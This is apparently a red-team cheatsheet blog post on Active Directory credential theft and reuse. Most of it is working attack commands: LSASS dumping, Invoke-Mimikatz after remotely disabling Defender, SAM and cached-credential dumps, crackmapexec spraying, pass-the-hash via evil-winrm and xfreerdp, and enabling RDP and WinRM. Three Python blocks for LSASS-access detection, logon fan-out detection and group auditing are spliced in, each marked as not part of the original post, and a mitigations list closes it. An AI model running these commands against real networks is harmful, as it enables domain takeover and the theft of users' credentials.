TL;DR ‘The Credential Theft Shuffle’ is Sean Metcalf’s term. This is just an attempt to put my notes regarding dumping and re-using credentials all in one place.
Welcome to Part VIII of our Cheatsheet Series!
Part I: Mimikatz cheatsheet
Part II: Set-Acl cheatsheet
Part III: Get-Acl cheatsheet
Part IV: Enumerating AD cheatsheet
Part V: Windows reverse shells cheatsheet
Part VI: MS Graph PowerShell cheatsheet
Part VII: Hash cracking cheatsheet
Part VIII: The Credential Theft Shuffle
Part IX: SACLs & Querying Collected Logs
Part X: Setting up a simple AD lab in Azure
Background
I cannot take credit for the term “The Credential Theft Shuffle”, as Sean Metcalf coined it years ago. It’s catchy and it encapsulates a red team TTP perfectly, so I have been using it ever since.
Other than crackmapexec and Out-Minidump, there’s nothing terribly new in here that we haven’t touched on in a prior howto somewhere. This is really just putting my notes regarding dumping and re-using creds all in one place.
All these techniques assume that you have Domain User access in AD and gained local administrator access to the system that you are dumping credentials from.
Finding plaintext creds in files
We’ll get started with an obvious one; searching files for passwords stored in cleartext:
Get-ChildItem C:\scripts\* -Recurse | Select-String -Pattern "password" -Context 3
Obviously this sort of thing shouldn’t happen, but users are human after all, hence it’s always worth looking for.
Dumping creds with Task Manager
It sounds obvious, but I have seen a lot of courses fail to mention this stupid simple method of dumping LSASS. Any local admin can run Task Manager if they have access to the GUI, view all processes, right click on ‘Local Security Authority Process’, and ‘Create dump file’. They can then move the resulting .DMP file offline, load it into Mimikatz, and grab any creds it contains.
Dumping creds with Out-Minidump.ps1
This essentially does the same thing as Task Manager, but is quite handy if all you have is CLI access, for example via evil-winrm. Simply
upload /home/kali/Downloads/exploits/PowerShell/Out-Minidump.ps1
Import-Module .\Out-Minidump.ps1
Get-Process lsass | Out-Minidump
download C:\Users\vack\Documents\lsass_708.dmp /home/kali/Downloads/Pilfered/lsass_708.dmp
One can then move the resulting .DMP file offline, load it into Mimikatz, and grab any creds it contains.
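Both of the dump methods above open a handle to lsass.exe with read access and call MiniDumpWriteDump, which is exactly what Sysmon Event ID 10 (ProcessAccess) records. The following is an added detection example, not code from the original post; the sample events are constructed and the allowlist is an assumption to tune per environment.

```python
"""Flag LSASS memory reads in Sysmon Event ID 10 (ProcessAccess) records.
Added example, not part of the original post. Sample records are constructed;
the allowlist is an assumption that must be tuned to the environment."""
PROCESS_VM_READ = 0x0010        # needed to read memory, hence to dump it

# Hypothetical allowlist of source images that legitimately touch LSASS.
ALLOWLIST = {
    r"c:\program files\windows defender\msmpeng.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}
# MiniDumpWriteDump lives in dbgcore.dll/dbghelp.dll (Task Manager and
# Out-Minidump both end up there); seeing them in the call trace is a strong
# signal that a .DMP file is being written.
DUMP_DLLS = ("dbgcore.dll", "dbghelp.dll")

def classify(evt):
    """Return an alert string for an LSASS read, or None for benign events."""
    if not evt["TargetImage"].lower().endswith(r"\lsass.exe"):
        return None
    source = evt["SourceImage"].lower()
    if source in ALLOWLIST:
        return None
    if not int(evt["GrantedAccess"], 16) & PROCESS_VM_READ:
        return None  # e.g. 0x1000 PROCESS_QUERY_LIMITED_INFORMATION
    via_dump_api = any(d in evt.get("CallTrace", "").lower() for d in DUMP_DLLS)
    how = "MiniDumpWriteDump" if via_dump_api else "direct memory read"
    return f"{source} opened LSASS ({evt['GrantedAccess']}) via {how}"

def scan(events):
    """All alerts for a batch of Sysmon EID 10 events, in order."""
    return [a for a in map(classify, events) if a]

LSASS = r"C:\Windows\system32\lsass.exe"
NTDLL = r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4"
SAMPLE_EVENTS = [  # constructed
    {"SourceImage": r"C:\Windows\System32\Taskmgr.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1FFFFF", "CallTrace": NTDLL + r"|C:\Windows\System32\dbgcore.dll+21a5"},
    {"SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": LSASS, "GrantedAccess": "0x1410", "CallTrace": NTDLL},
    {"SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetImage": LSASS, "GrantedAccess": "0x1410",
     "CallTrace": NTDLL + r"|C:\Windows\SYSTEM32\dbghelp.dll+5f3a|UNKNOWN(00007FF9A3B40000)"},
    {"SourceImage": r"C:\Windows\System32\svchost.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1000", "CallTrace": NTDLL},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print("ALERT:", alert)
```

Task Manager and the PowerShell dump are both flagged; Defender is allowlisted and the svchost.exe query-only handle has no VM_READ bit, so neither alerts.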
Reading a LSASS dump file
Earlier we showed two ways to dump LSASS to a *.DMP file. One can read the file offline using mimikatz.exe:
sekurlsa::minidump lsass_708.DMP
sekurlsa::logonpasswords
Dumping creds with Invoke-Mimikatz.ps1
Everyone has their preferences; mine is that I rarely use mimikatz.exe outside of my own workstation VM on test.local. We keep a Windows 10 system around with mimikatz, John, Hashcat, BloodHound, Visual Studio, etc. for reading data, compiling stuff, hash cracking, and so on. If we were a big outfit we’d have a physical workstation for this sort of thing, but we run this place on a shoestring budget so it’s just a VM.
We prefer to use Invoke-Mimikatz.ps1 for THM, labs, ranges, exams, etc. The classic TTP for this goes
Invoke-Command -ScriptBlock {Set-MpPreference -DisableRealTimeMonitoring $true} -ComputerName Exodus
Invoke-Mimikatz -ComputerName Exodus -Command '"token::elevate" "privilege::debug" "sekurlsa::logonpasswords"'
Some other useful Mimikatz commands to put in that third spot are:
vault::cred #dump Credential Manager
lsadump::sam #dump the SAM
lsadump::cache #dump cached Domain credentials (these must be cracked, PTH doesn't work on mscache)
Cracking mscache
We first went over mscache while running a lab exercise on HiveNightmare. I have yet to take a course or exam that even mentioned it. The cliff notes, learned from CW6 Google and some hands on in the lab, is that mscache is what Windows uses to store cached domain credentials locally. It exists so that after a Domain User has logged onto a workstation once, they can log on again later even if the system is disconnected from the domain.
The important thing to bear in mind about mscache is that it cannot be used to PTH, as NTLM can. It can only be cracked.
Hashcat:
hashcat -m2100 '$DCC2$10240#jane#cfea5bd6c6471535ce65b0a4425cc97e' /home/kali/Downloads/Wordlists/realhuman_phill.txt --force --potfile-disable
John:
john --format=mscache2 ./mscache.txt --wordlist=/home/kali/Downloads/Wordlists/JohnList
Dumping creds with crackmapexec
Crackmapexec, like mimikatz, is another one of those incredibly versatile tools. Let’s say you grabbed a username and either a password or an NTLM hash earlier. You can then throw it at every other system in the domain, lab, range, whatever. Not only will crackmapexec show which systems that user can access, it can automatically dump creds from any system on which that user is a local admin.
The basic syntax is:
crackmapexec smb /home/kali/Downloads/targets.txt -d kinetic -u von -p SpellCast3r
The -d part can be left off if you don’t want to specify a domain; crackmapexec will then use whatever domain the target system is on.
Additional options:
winrm #attempt PSSession
rdp #kinda self explanatory, try to RDP with the provided creds
--local-auth #basically puts .\ in front of the user and tries local auth to each system
-H <NTLM> #PTH
--sam #auto dump the SAM on any systems the creds get local admin on
--lsa #auto dump the LSASS, includes mscache
Crackmapexec is a crossover in this howto as it both dumps and re-uses creds.
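From the blue team side, that re-use step leaves a distinctive footprint in centrally collected Security logs: one account producing 4624 network (type 3) or RDP (type 10) logons on many hosts within seconds, and, with --local-auth, the same local account name authenticating across hosts (the pattern LAPS is meant to break). The following is an added detection example, not from the original post; the events are constructed and the window and threshold are assumptions.

```python
"""Detect one credential replayed against many hosts (the crackmapexec
pattern) in centrally collected 4624 logon events. Added example, not part
of the original post; events are constructed, window and threshold are
assumptions to tune per environment."""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)
MIN_HOSTS = 3
REMOTE_LOGON_TYPES = {3, 10}   # 3 = network (SMB/WinRM), 10 = RDP

def parse(line):
    """Constructed export: time|Computer|TargetDomain|TargetUser|LogonType|AuthPkg|IpAddress"""
    t, comp, dom, user, ltype, pkg, ip = line.split("|")
    return {"time": datetime.fromisoformat(t), "host": comp.lower(),
            "domain": dom.lower(), "user": user.lower(),
            "type": int(ltype), "pkg": pkg, "ip": ip}

def find_spray(lines, window=WINDOW, min_hosts=MIN_HOSTS):
    """(account, source ip) pairs whose remote logons reached >= min_hosts
    distinct hosts inside `window`, mapped to the sorted host list."""
    by_key = defaultdict(list)
    for e in sorted(map(parse, lines), key=lambda e: e["time"]):
        if e["type"] in REMOTE_LOGON_TYPES:
            by_key[(f'{e["domain"]}\\{e["user"]}', e["ip"])].append(e)
    hits = {}
    for key, evs in by_key.items():
        for i, first in enumerate(evs):            # sliding window
            hosts = {x["host"] for x in evs[i:] if x["time"] - first["time"] <= window}
            if len(hosts) >= min_hosts:
                hits[key] = sorted(hosts)
                break
    return hits

def local_account_reuse(lines):
    """Local accounts (TargetDomain == Computer) used over the network on
    more than one host: the --local-auth pattern that LAPS is meant to break."""
    seen = defaultdict(set)
    for e in map(parse, lines):
        if e["type"] == 3 and e["domain"] == e["host"]:
            seen[e["user"]].add(e["host"])
    return {u: sorted(h) for u, h in seen.items() if len(h) > 1}

SAMPLE_4624 = """2024-03-01T09:00:01|EXODUS|KINETIC|von|3|NTLM|10.65.1.50
2024-03-01T09:00:02|GENESIS|KINETIC|von|3|NTLM|10.65.1.50
2024-03-01T09:00:03|LEVITICUS|KINETIC|von|3|NTLM|10.65.1.50
2024-03-01T09:00:04|NUMBERS|KINETIC|von|10|NTLM|10.65.1.50
2024-03-01T09:10:00|EXODUS|KINETIC|jane|2|Negotiate|-
2024-03-01T09:12:00|GENESIS|GENESIS|administrator|3|NTLM|10.65.1.50
2024-03-01T09:12:05|NUMBERS|NUMBERS|administrator|3|NTLM|10.65.1.50""".splitlines()
```

Note that NTLM pass-the-hash and a real password logon look identical in the target's 4624, so the signal here is the fan-out across hosts, not the authentication package.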
Pass-The-Hash (PTH)
PSSession via evil-winrm from Kali:
evil-winrm -i 10.65.1.38 -u administrator -H 861305d859334b557a3341c83be51462
RDP PTH from Kali:
xfreerdp /v:10.65.1.38 /u:administrator /pth:861305d859334b557a3341c83be51462
If RDP wasn’t enabled already, just copy/paste this after connecting via evil-winrm:
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0 ; Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
If WinRM wasn’t enabled, copy/paste this after getting a reverse shell, or however you got in initially:
winrm quickconfig -force
Repeat
Once access is gained to a new system the process is repeated. Creds are dumped & re-used.
Sidenote on AD privileges
I am probably preaching to the choir, but one wants to check compromised accounts for any privileges they may hold in AD as well as for access to other systems. One can easily do this with PowerView:
Invoke-ACLScanner | Where-Object {$_.IdentityReference -like "*Mishky*"}
This method is simple, quick, and easy; however, it does not check the groups the given user might be in, or the groups those groups are nested in. It works well for CTFs, ranges, etc. where the user is only in one or two groups total, since one can just run the query for those groups as well.
However in complex domain environments we are partial to Mishky’s version. It leverages Alex Hansen’s Get-ADNestedGroups.ps1 to check everything all at once. I have actually seen a vendor sell a tool that enumerates nested groups in AD for hundreds of dollars a year. Seriously, save your money and just use Get-ADNestedGroups.ps1 to enumerate upwards and use
Get-ADGroupMember -Identity "SSPR" -Recursive
to enumerate all members of a given group, including nested ones.
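The logic behind both of those walks is a graph traversal over memberOf edges, upward for a user and downward for a group, that has to tolerate nesting loops. The following is an added example, not the post’s own code and not Get-ADNestedGroups.ps1; the membership map is constructed, and it generalizes to an audit view of which users effectively hold a set of privileged groups.

```python
"""Transitive AD group membership, both directions: the check the post notes
a plain per-user ACL filter misses. Added example, not part of the original
post or of Get-ADNestedGroups.ps1; the membership map is constructed."""
from collections import deque

# Constructed memberOf map: principal -> groups it is a DIRECT member of.
# Helpdesk and Tier2 contain each other on purpose: nested-group walks must
# survive cycles, which real directories do accumulate.
MEMBER_OF = {
    "mishky": {"SSPR", "Helpdesk"},
    "von": {"Workstation Admins"},
    "SSPR": {"Account Operators"},
    "Helpdesk": {"Tier2"},
    "Tier2": {"Helpdesk", "Server Operators"},
    "Workstation Admins": set(), "Account Operators": set(), "Server Operators": set(),
}

def _walk(start, edges):
    """BFS from `start` over `edges`, returning everything reachable once."""
    seen, queue = set(), deque(edges.get(start, ()))
    while queue:
        node = queue.popleft()
        if node not in seen:          # skips cycles and diamonds
            seen.add(node)
            queue.extend(edges.get(node, ()))
    return seen

def effective_groups(principal, member_of=MEMBER_OF):
    """Upward: every group `principal` is in directly or through nesting."""
    return _walk(principal, member_of)

def effective_members(group, member_of=MEMBER_OF):
    """Downward, like Get-ADGroupMember -Recursive: non-group principals
    that end up in `group` through any chain of nesting."""
    children = {}
    for p, groups in member_of.items():
        for g in groups:
            children.setdefault(g, set()).add(p)
    return {p for p in _walk(group, children) if p not in children}

def who_holds(privileged, member_of=MEMBER_OF):
    """Audit view: user -> sorted privileged groups they effectively hold."""
    groups = {g for gs in member_of.values() for g in gs}
    out = {}
    for user in (p for p in member_of if p not in groups):
        held = sorted(effective_groups(user, member_of) & set(privileged))
        if held:
            out[user] = held
    return out
```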
Endgame
The goal of ‘The Shuffle’ is of course to eventually pivot to an account that is a Domain Admin, has privileges to add themselves to it, can DCSync, etc. At this point one owns the domain, can dump all users’ NTLM hashes, and can then feed them into Crackstation, hashcat, etc. to check for plaintext passwords.
Given human nature an attacker is bound to get lucky and find that Joe in Finance is using the same password on the organization’s bank account that he is using in AD, for example. Password re-use and human nature can vastly expand the attack surface.
Mitigations
- Keep systems up to date on patches
- Don’t let Domain Users be local admins on their workstations
- Don’t let Domain Admins and other highly privileged users get into bad habits, like logging in on random workstations
- Use smartcards for privileged users, disable delegation on their account, and put them in the Privileged User group in AD
- Utilize LAPS
- If you are truly paranoid, LAPS can be leveraged so the helpdesk doesn’t even login to users’ workstations
- Audit for things like who can modify the Domain Admins, who can DCSync, who can push GPOs, etc
References
The Credential Theft Shuffle: https://adsecurity.org/?p=2362
Finding strings in files with PowerShell: https://blog.ironmansoftware.com/daily-powershell/powershell-select-string/
Get-ADUserNestedGroups: http://blog.tofte-it.dk/powershell-get-all-nested-groups-for-a-user-in-active-directory/